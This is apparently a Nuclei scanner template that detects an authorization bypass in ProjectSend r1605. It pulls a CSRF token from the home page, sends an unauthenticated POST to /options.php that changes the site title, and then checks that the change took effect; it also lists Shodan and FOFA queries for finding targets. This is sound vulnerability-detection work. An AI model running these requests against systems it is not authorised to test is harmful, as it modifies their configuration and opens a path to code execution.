id: projectsend-auth-bypass

info:
  name: ProjectSend <= r1605 - Improper Authorization
  author: DhiyaneshDK
  severity: high
  description: |
    An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
  reference:
    - https://www.projectsend.org/
    - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="ProjectSend"
    shodan-query: html:"ProjectSend"
  tags: misconfig,projectsend,auth-bypass

variables:
  string: "{{randstr}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "projectsend")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="csrf_token" value="([0-9a-z]+)"'
        internal: true

  - raw:
      - |
        POST /options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf}}&section=general&this_install_title={{string}}

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "{{string}}")'
        condition: and
# digest: 4b0a00483046022100cbdf7867367646663d0f95096da7ed83173ecc5ad6edfbbb81fffd3afe8efcfa0221009cbb5bae0b46406c68174051fdff85191ee72553de70ffbb7e575a1b6c4b4aa1:922c64590222798bb761d5b6d8e72950